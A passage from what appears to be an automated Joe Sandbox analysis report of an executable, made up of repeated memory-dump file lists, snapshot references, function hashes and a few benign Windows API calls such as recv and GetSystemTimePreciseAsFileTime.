                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                          • Opcode ID: 94053547ead471583a8260367fee6f62fd7878391145dd290beaf257eaa59991
                                                                                                                                                                                                                                          • Instruction ID: eee59b1c372e4678cef2de3bff14ecba55281c17fa01d88ac1884944a48798f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94053547ead471583a8260367fee6f62fd7878391145dd290beaf257eaa59991
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1C21771E046288FCB25CE28ED507AAB7B9FB48315F1441EAD84DE7240E779AEC18F51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000004,00000000), ref: 007EE10B
                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000008,00000000), ref: 007EE140
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: recv
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1507349165-0
                                                                                                                                                                                                                                          • Opcode ID: 6f8a1bf99f4e5f1747dca40719be7ffc42d9b252a97167af35fdb7b6a361f7bf
                                                                                                                                                                                                                                          • Instruction ID: a5bf22a6dd9da9bd0d196d2aa7063ca3748cec0f7b823432c5ab1267445f3ac7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f8a1bf99f4e5f1747dca40719be7ffc42d9b252a97167af35fdb7b6a361f7bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31C7B1A04288DBDB20CB6DDC85BAFB7BCFB0D724F050A25E514E7391D679A844CB60
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                          • Instruction ID: 3983c145aca3198818a92557f2a2e27e9f4cde174c288d1a0a0c5a38babac658
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F15E71E002299FDF14CFA8D8906ADB7B1FF48314F25826AE919EB345D731AE41CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,007FCF52,?,00000003,00000003,?,007FCF87,?,?,?,00000003,00000003,?,007FC4FD,007E2FB9,00000001), ref: 007FCC03
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1802150274-0
                                                                                                                                                                                                                                          • Opcode ID: 1a70162a02635c66c925a1882f1864e5cebe654fdd4212c8258689e353fcd5b2
                                                                                                                                                                                                                                          • Instruction ID: 6440a35805b02df0bc45489dbdbe50e9bbaa1c5cccedfd0c3232a975e1d73dff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a70162a02635c66c925a1882f1864e5cebe654fdd4212c8258689e353fcd5b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDD0223258203C938A072B85EC008BDBB88AB01B183000021EE0893220CA546C00CBE1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
